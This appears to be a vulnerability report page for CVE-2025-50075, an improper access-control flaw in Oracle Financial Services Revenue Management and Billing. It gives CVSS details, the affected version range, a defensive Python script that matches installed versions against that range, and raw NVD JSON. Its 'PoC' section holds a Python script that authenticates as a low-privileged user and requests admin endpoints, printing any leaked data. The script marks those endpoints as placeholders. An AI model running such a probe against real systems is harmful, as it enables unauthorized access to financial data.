Security Vulnerability Report
CVE-2025-50075 CVSS 6.5 MEDIUM

CVE-2025-50075

Published: 2025-10-21 20:20:40
Last Modified: 2025-10-28 16:15:46

Description

Vulnerability in the Oracle Financial Services Revenue Management and Billing product of Oracle Financial Services Applications (component: Security Management System). Supported versions that are affected are 2.9.0.0.0-7.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Revenue Management and Billing. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Revenue Management and Billing accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Exploitability Sub-score / Impact Sub-score
2.8 / 3.6
Weakness (CWE)
CWE-284 (Improper Access Control)

Configurations (Affected Products)

cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:*:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Revenue Management and Billing 2.9.0.0.0
Oracle Financial Services Revenue Management and Billing 2.9.x.x.x
Oracle Financial Services Revenue Management and Billing 3.x.x.x.x
Oracle Financial Services Revenue Management and Billing 4.x.x.x.x
Oracle Financial Services Revenue Management and Billing 5.x.x.x.x
Oracle Financial Services Revenue Management and Billing 6.x.x.x.x
Oracle Financial Services Revenue Management and Billing 7.0.0.0.0
Oracle Financial Services Revenue Management and Billing 7.1.0.0.0
Oracle Financial Services Revenue Management and Billing 7.2.0.0.0
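The affected range is recorded in the NVD configuration as versionStartIncluding 2.9.0.0.0 through versionEndIncluding 7.2.0.0.0 on a wildcard CPE, which is what the product list above expands. The check below is an added example (not code from this report, NVD or Oracle) that applies such a cpeMatch range to installed version strings; the inventory it runs over is constructed for illustration. The point it makes is that Oracle's five-component versions must be compared as integer tuples, because a string comparison would classify 7.10.0.0.0 as older than 7.2.0.0.0 and flag it as affected.

```python
# Constructed copy of the cpeMatch node from this report's NVD JSON.
CPE_MATCH = {
    "vulnerable": True,
    "criteria": "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:*:*:*:*:*:*:*:*",
    "versionStartIncluding": "2.9.0.0.0",
    "versionEndIncluding": "7.2.0.0.0",
}

# Constructed sample inventory (hostname -> reported product version).
SAMPLE_INVENTORY = {
    "rmb-prod-01": "7.2.0.0.0",   # last affected release
    "rmb-prod-02": "7.10.0.0.0",  # newer than 7.2, not in range
    "rmb-uat-01": "2.9",          # short form of 2.9.0.0.0
    "rmb-legacy": "2.8.0.0.0",    # older than the range start
    "rmb-test": "7.2.0.0.1",      # one patch level past the range end
}


def parse_version(version: str) -> tuple:
    """'7.2.0.0.0' -> (7, 2, 0, 0, 0). Rejects non-numeric components."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"non-numeric version: {version!r}")
    return tuple(int(p) for p in parts)


def compare(a: tuple, b: tuple) -> int:
    """Three-way compare after zero-padding, so (2, 9) equals (2, 9, 0, 0, 0)."""
    n = max(len(a), len(b))
    a = a + (0,) * (n - len(a))
    b = b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def is_affected(installed: str, match: dict = CPE_MATCH) -> bool:
    """Apply an NVD cpeMatch version range (all four bound keys) to a version."""
    if not match.get("vulnerable", False):
        return False
    v = parse_version(installed)
    lo_inc = match.get("versionStartIncluding")
    lo_exc = match.get("versionStartExcluding")
    hi_inc = match.get("versionEndIncluding")
    hi_exc = match.get("versionEndExcluding")
    if lo_inc and compare(v, parse_version(lo_inc)) < 0:
        return False
    if lo_exc and compare(v, parse_version(lo_exc)) <= 0:
        return False
    if hi_inc and compare(v, parse_version(hi_inc)) > 0:
        return False
    if hi_exc and compare(v, parse_version(hi_exc)) >= 0:
        return False
    return True


def affected_hosts(inventory: dict, match: dict = CPE_MATCH) -> list:
    """Sorted hostnames whose version falls inside the vulnerable range."""
    return sorted(h for h, ver in inventory.items() if is_affected(ver, match))


if __name__ == "__main__":
    for host in affected_hosts(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} is in the CVE-2025-50075 range")
```

Run against the sample inventory it reports rmb-prod-01 and rmb-uat-01 only; a naive `"2.9.0.0.0" <= version <= "7.2.0.0.0"` string test would additionally and wrongly report rmb-prod-02.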

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-50075 - Oracle Financial Services Revenue Management and Billing PoC
# Vulnerability: Unauthorized Data Access in Security Management System
# CVSS 3.1: 6.5 (Medium)
#
# Caveat: Oracle's advisory does not disclose the vulnerable endpoint(s).
# The token URL and the endpoint paths below are placeholders carried by
# this PoC, not paths published by Oracle; adjust them to the target.
import requests

# Target configuration
TARGET_URL = "https://target-oracle-fsrmb.com"
USERNAME = "low_privileged_user"
PASSWORD = "user_password"
TIMEOUT = 15  # seconds per request, so a hung target does not stall the run


def exploit_cve_2025_50075():
    """Probe Security Management System endpoints with a low-privileged token.

    The vulnerability allows low-privileged users to read critical data over
    HTTP; an HTTP 200 with a body on an endpoint that should be admin-only is
    the indicator of the access-control gap.
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privileged credentials.
    # verify=False is deliberate for lab targets with self-signed certificates.
    login_url = f"{TARGET_URL}/oauth/token"  # placeholder password-grant endpoint
    auth_payload = {
        "grant_type": "password",
        "username": USERNAME,
        "password": PASSWORD,
    }
    response = session.post(login_url, data=auth_payload, verify=False, timeout=TIMEOUT)
    if response.status_code != 200:
        print(f"[-] Authentication failed: HTTP {response.status_code}")
        return

    try:
        token = response.json().get("access_token")
    except ValueError:
        token = None
    if not token:
        print("[-] No access_token in authentication response")
        return

    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }

    # Step 2: Security Management System endpoints that should require
    # elevated privileges (placeholder paths, see caveat above).
    restricted_endpoints = [
        "/security-management/admin/users/all",
        "/security-management/admin/roles/all",
        "/security-management/admin/permissions/all",
        "/security-management/audit/logs",
        "/security-management/config/sensitive",
    ]

    for endpoint in restricted_endpoints:
        url = f"{TARGET_URL}{endpoint}"
        print(f"[*] Attempting to access: {endpoint}")
        # Step 3: Send request to restricted endpoint with low-privileged token.
        response = session.get(url, headers=headers, verify=False, timeout=TIMEOUT)
        if response.status_code == 200:
            print(f"[+] SUCCESS: Unauthorized access to {endpoint}")
            print(f"[+] Data leaked: {response.text[:500]}")
        else:
            print(f"[-] Access denied: {response.status_code}")


if __name__ == "__main__":
    exploit_cve_2025_50075()

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory: Oracle Critical Patch Update, October 2025; the fix is delivered through this CPU)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-50075",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:40.173",
    "lastModified": "2025-10-28T16:15:45.733",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle Financial Services Revenue Management and Billing product of Oracle Financial Services Applications (component: Security Management System). Supported versions that are affected are 2.9.0.0.0-7.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Revenue Management and Billing. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Revenue Management and Billing accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.9.0.0.0",
                "versionEndIncluding": "7.2.0.0.0",
                "matchCriteriaId": "EA8187E3-E17F-4B25-B895-4A06434A5059"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}